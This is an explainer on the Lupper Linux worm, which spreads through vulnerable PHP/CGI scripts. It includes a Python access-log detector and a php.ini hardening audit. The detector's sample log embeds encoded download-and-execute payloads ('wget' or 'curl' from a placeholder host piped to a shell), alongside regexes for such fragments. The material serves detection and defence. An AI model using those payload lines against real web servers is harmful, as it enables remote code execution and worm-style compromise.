Lupper Worm 101

Malware authors are persistent. Windows is no longer the only platform under attack: Mac OS X and Linux, systems with a reputation for security, are now being exploited too. Several recent worms take advantage of vulnerabilities in XML-RPC for PHP, a widely used open-source library bundled with many web applications.

Applications that shipped the vulnerable library include b2evolution, Drupal, PHPGroupWare, PostNuke, Tiki Wiki, WordPress and Xoops. Most of them have released updated versions that address the vulnerabilities, but unpatched Linux systems remain exposed to Linux.Plupii, more commonly called the Lupper worm.

How the Worm Functions

The Lupper worm spreads by exploiting Apache web servers that run vulnerable PHP and CGI scripts; the fault lies in particular scripts, not in the languages themselves. It has been described as a variant of the Linux Slapper and BSD Scalper worms because it propagates in the same way. It attacks a web server by sending crafted HTTP (Hypertext Transfer Protocol) requests to the server's web port. If the targeted server runs a vulnerable script at a particular URL, the request makes the server download and execute a copy of the worm. This only works where the PHP/CGI configuration permits fetching remote files and running external shell commands. Its most alarming feature is the backdoor it opens on the compromised server. The worm then generates target URLs and scans for further machines to infect. It also harvests e-mail addresses from the infected host.
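The propagation pattern described above leaves a trail in the web server's access log: requests aimed at XML-RPC and CGI endpoints whose target carries a download-and-execute command fragment, repeated from one source address against many URLs. The following Python detector is an added example, not code from the article or from any vendor; the endpoint names, the regular expressions and the log lines are constructed assumptions chosen to illustrate the pattern, not the worm's published signatures.

```python
"""Flag Apache access-log entries that look like Lupper-style probes.

Added example (not code from the article or any vendor).  The worm sends
HTTP requests to PHP/CGI endpoints that make the server fetch and run a
copy of the worm, so two things are worth flagging in the access log:
  - request targets carrying a download-and-execute command fragment, and
  - POSTs to XML-RPC endpoints (the exploit travels in the body, which the
    access log does not record, so these are only a lead to follow up).
The endpoint names and regexes are illustrative assumptions, not the
worm's published signatures; the log lines are constructed samples.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import unquote_plus

# Apache "combined" LogFormat; only the fields we use are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Script endpoints of the kind the worm targets (assumed names).
ENDPOINT_RE = re.compile(r'/(xmlrpc\.php|xmlrpc/server\.php|cgi-bin/[^\s?]+\.(?:pl|cgi))', re.I)
# A fetch tool followed by a URL: "wget http://...", "curl http://...".
FETCH_RE = re.compile(r'\b(?:wget|curl|lynx|fetch)\s+\S*://', re.I)
# Shell chaining into an interpreter or file operation: ";sh", "| sh", "|cd".
SHELL_RE = re.compile(r'[;|`]\s*(?:sh|bash|perl|chmod|cd)\b', re.I)


@dataclass
class Hit:
    ip: str
    target: str      # URL-decoded request target
    severity: str    # "high" = command fragment seen, "low" = needs body inspection
    reason: str


def classify(line: str) -> Optional[Hit]:
    """Return a Hit for a suspicious log line, None for benign or unparsable ones."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Exploit strings arrive percent-encoded in the query string; decode first.
    target = unquote_plus(m.group('target'))
    endpoint = ENDPOINT_RE.search(target)
    if FETCH_RE.search(target) or SHELL_RE.search(target):
        where = endpoint.group(1) if endpoint else 'non-script path'
        return Hit(m.group('ip'), target, 'high',
                   'download-and-execute fragment aimed at ' + where)
    if endpoint and m.group('method') == 'POST':
        return Hit(m.group('ip'), target, 'low',
                   'POST to XML-RPC/CGI endpoint; request body not logged, inspect separately')
    return None


def scan(lines: Iterable[str]) -> List[Hit]:
    return [h for h in (classify(l) for l in lines) if h is not None]


def scanners(hits: Iterable[Hit], threshold: int = 2) -> List[str]:
    """Source addresses with at least `threshold` high-severity hits.

    The worm generates target URLs and walks through them, so repeated
    exploit attempts from one address are the propagation pattern, as
    opposed to a single targeted request."""
    counts = Counter(h.ip for h in hits if h.severity == 'high')
    return sorted(ip for ip, n in counts.items() if n >= threshold)


# Constructed sample log (RFC 5737 test addresses); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Nov/2005:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [07/Nov/2005:10:12:07 +0000] "POST /xmlrpc.php HTTP/1.0" 200 312 "-" "-"',
    '192.0.2.44 - - [07/Nov/2005:10:12:09 +0000] "GET /cgi-bin/report.pl?dir=%7Ccd%20%2Ftmp%3Bwget%20'
    'http%3A%2F%2F198.51.100.9%2Fbot%3Bchmod%20%2Bx%20bot%3B.%2Fbot%7C HTTP/1.0" 404 291 "-" "-"',
    '192.0.2.44 - - [07/Nov/2005:10:12:10 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 200 42 "-" "-"',
    '192.0.2.44 - - [07/Nov/2005:10:12:11 +0000] "GET /cgi-bin/lookup.cgi?q=%3Bcurl%20'
    'http%3A%2F%2F198.51.100.9%2Fx%20%7C%20sh HTTP/1.0" 404 291 "-" "-"',
    '198.51.100.7 - - [07/Nov/2005:10:15:30 +0000] "GET /cgi-bin/report.pl?dir=%2Fvar%2Flog HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h.severity.upper(), h.ip, h.reason)
    print('probable scanners:', scanners(found))
```

Two design points matter in practice. The query string is decoded before matching, because the exploit strings arrive percent-encoded and a literal `wget` will rarely appear in the raw log. And a POST to an XML-RPC endpoint is only a low-severity lead: the access log does not record request bodies, and legitimate blog clients use XML-RPC too, so confirming that class of attempt needs a packet capture or a web application firewall log rather than the access log alone.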

Protecting against the Lupper Worm

Lupper was spotted quickly and does not seem to be spreading at the rate the Slapper worm did. Because worms that exploit Linux systems are rare compared with the Windows environment, security experts suggest this program is still worth watching. Representatives from McAfee say Lupper's goal is to form a global network of compromised machines that communicate peer-to-peer. Such a network is robust, and because the backdoor accepts remote commands it can be used to launch DDoS (distributed denial-of-service) attacks and other exploits. The vendor also fears that the worm's ability to harvest e-mail addresses may lead to new infection methods.

The good news is that most large corporations are not running applications written in PHP or as CGI scripts. The continuing risk comes from unofficial sites set up inside or outside an organisation, and from web hosting companies that run a wide variety of scripts. Because Lupper appears to propagate by generating IP addresses, it has to guess both an address and a vulnerable script path, so it is less likely to locate servers running vulnerable scripts, which limits the chance of infection. It would be much harder to contain if it located hosts through search-engine results, a technique common in Windows-based malware.

Security experts have recommended several ways to deal with this infection. Keeping the affected applications updated removes the vulnerable scripts; another recommendation is to grant only trusted users access to an FTP server, although Lupper itself spreads over HTTP rather than FTP. Symantec Corporation rates the Lupper worm's damage and distribution as medium. McAfee labels it a low-risk threat for both home and corporate users.
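The worm's download-and-execute step depends on a server configuration that lets PHP fetch remote files and run external shell commands, so checking those settings is a practical hardening step alongside patching. The following audit script is an added example, not configuration from the article or from any vendor advisory. It assumes the injected code runs inside PHP (a Perl CGI script is not governed by php.ini at all), and the weak and hardened php.ini texts it contains are constructed samples.

```python
"""Audit php.ini settings that let an injected snippet fetch and run a remote file.

Added example, not configuration from the article or from any vendor
advisory.  The worm's payload only works where the server may download a
remote file and run external shell commands, so this checks the two PHP
settings that govern that (assumption: the exploit runs inside PHP; a Perl
CGI script is not constrained by php.ini at all).  The sample ini texts are
constructed.  Tightening these settings limits the damage from an injected
command but does not fix the vulnerable library; patching does that.
"""
from typing import Dict, List

# Functions an injected PHP snippet calls to run "wget ...; chmod +x ...; ./bot".
EXEC_FUNCS = ('exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open')


def parse_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: 'key = value' lines, ';' comments, [sections] ignored."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('[') or '=' not in line:
            continue
        key, value = line.split('=', 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def php_bool(value: str) -> bool:
    """php.ini truthiness: On/1/True/Yes are true; Off/0/False/No/None/'' are false."""
    return value.strip().lower() in ('on', '1', 'true', 'yes')


def audit(settings: Dict[str, str]) -> List[str]:
    """Return one finding per weak setting; an empty list means both controls are in place."""
    findings: List[str] = []
    # PHP's built-in default is On, so a missing key counts as the weak state.
    if php_bool(settings.get('allow_url_fopen', 'On')):
        findings.append('allow_url_fopen=On: PHP can open http:// URLs, so injected '
                        'include()/file_get_contents() calls can pull a remote payload')
    disabled = {f.strip().lower()
                for f in settings.get('disable_functions', '').split(',') if f.strip()}
    exposed = [f for f in EXEC_FUNCS if f not in disabled]
    if exposed:
        findings.append('shell-execution functions still callable: ' + ', '.join(exposed))
    return findings


# Constructed sample: a stock-looking php.ini that leaves both doors open.
WEAK_INI = """
[PHP]
; defaults as shipped: remote URLs readable, nothing disabled
allow_url_fopen = On
disable_functions =
"""

# Constructed sample: the same file with both controls tightened.
HARDENED_INI = """
[PHP]
allow_url_fopen = Off
disable_functions = exec,shell_exec,system,passthru,popen,proc_open
"""

if __name__ == '__main__':
    for name, text in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(name + ':', audit(parse_ini(text)) or ['ok'])
```

The check treats a missing `allow_url_fopen` key as weak because PHP's compiled-in default is On; an auditor that only flags explicit `On` lines would pass a stock installation. Disabling the shell-execution functions breaks any legitimate application feature that shells out, so the hardened list should be reconciled with what the hosted applications actually call before it is deployed.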

